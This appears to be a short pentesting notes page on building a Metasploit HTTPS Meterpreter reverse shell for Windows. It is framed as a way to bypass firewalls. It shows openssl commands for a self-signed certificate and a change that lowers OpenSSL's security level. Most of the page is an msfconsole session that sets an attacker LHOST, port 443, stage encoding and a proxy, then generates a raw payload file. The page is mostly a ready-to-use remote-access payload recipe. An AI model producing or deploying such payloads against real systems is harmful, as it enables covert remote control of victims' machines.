# HTTPs Meterpreter ## Overview > HTTPs Meterpreter is a type of Meterpreter shell that uses HTTPs protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly. ## Generating your own self signed certificate To generate your own self signed certificate: ```bash openssl req -new -x509 -nodes -out cert.crt -keyout priv.key ``` In order for the Metasploit to use the cert we will concatinate the private and public key to create us a .pem file ```bash cat priv.key cert.crt > rfc.pem ``` {% hint style="info" %} We also must change the *CipherString* in the /etc/ssl/openssl.cnf config file or our reverse HTTPS shell will not work properly. First, we will locate this line in the config file: ```bash CipherString=DEFAULT@SECLEVEL=2 ``` and change to to: ```bash CipherString=DEFAULT ``` {% endhint %} Finally, we can set it in our Metasploit instance: ```bash set StagerVerifySSLCert true set HandlerSSLCert /home/kali/self_cert/rfc.pem ``` ## Msfconsole generate payload To generate a Meterpreter payload: {% code overflow="wrap" %} ```bash msf6 > use windows/x64/meterpreter/reverse_https msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0 LHOST => 192.168.45.5 msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443 LPORT => 443 msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true StagerVerifySSLCert => true msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem handlersslcert => ../../payloads/SpaceX.pem msf6 exploit(multi/handler) > set EnableStageEncoding true EnableStageEncoding => true ## optional proxy msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50 HttpProxyHost => 172.16.20.50 msf6 exploit(multi/handler) > set HttpProxyPort 8080 HttpProxyPort => 8080 msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin ``` {% endcode %} ## References {% embed url="" %}